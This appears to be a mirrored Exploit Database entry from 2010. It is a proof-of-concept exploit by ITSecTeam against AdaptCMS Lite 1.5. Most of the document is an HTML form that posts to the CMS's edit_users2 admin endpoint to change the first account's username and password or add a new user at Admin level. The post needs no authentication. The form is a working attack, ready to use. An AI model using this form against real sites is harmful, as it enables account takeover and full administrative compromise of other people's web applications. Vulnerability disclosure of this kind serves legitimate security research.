AdaptCMS Lite 1.5 – Arbitrary Add Admin

• Exploit Database
• 10 阅读

• 作者： ITSecTeam
  日期： 2010-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11899/

• ===========================================================================
  ( #Topic : AdaptCMS_Lite_1.5 2009-07-07
  ( #Bug type : change admin (user,passwd) & add new admin user exploit
  ( #Download :
  http://sourceforge.net/projects/adaptcms/files/AdaptCMS%20Lite%20v1/1.5/AdaptCMS_Lite_1.5.zip/download
  ( #Advisory :
  ===========================================================================
  ( #Author : ItSecTeam
  ( #Email : Bug@ITSecTeam.com #
  ( #Website: http://www.itsecteam.com #
  ( #Forum : http://forum.ITSecTeam.com #
  ( #Original Advisory:
  www.ITSecTeam.com/en/vulnerabilities/vulnerability28.htm
  ( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members!
  
  ---------------------------------------------------------------------
  exploit:
  
  <html>
  <head>
  <body>
  <h2>coded by ahmadbady</h2>
  <form action='admin.php?view=edit_users2&id=1' method='post'>
  <table cellpadding='5' cellspacing='0' border='0' width='480'
  style='padding-left:5px' align='left'>
  <tr><td>Username</td><td><input type='text' name='username1' size='16'
  value='anything'
  style='font-family: tahoma; font-size: 11px; border: 1px solid
  #444444;padding-left:1px'>
  </td></tr><tr><td>New Password?</td><td><input type='text'
  name='password1' size='16'
  style='font-family: tahoma; font-size: 11px; border: 1px solid
  #444444;padding-left:1px'>
  </td></tr><tr><td>E-Mail</td><td><input type='text' name='email1'
  size='16' value='anything'
  style='font-family: tahoma; font-size: 11px; border: 1px solid
  #444444;padding-left:1px'>
  </td></tr><tr><td>Level</td><td><select name='level' style='font-family:
  tahoma;
  font-size: 11px; border: 1px solid #444444;padding-left:1px'><option
  value='Admin'
  selected>Admin - Level 1</option><option value='Member'>Member - Level
  3</option>
  <option value='Staff'>Staff - Level 2</option></select></td></tr><tr><td>
  <input type='submit' value='Update User'
  style='font-family: tahoma; font-size: 11px; border: 1px solid
  #444444;padding-left:1px'>
  </td>
  </tr></table></form> </td></tr></table>
  </body>
  </html>
  ---------------------------------------------------------------------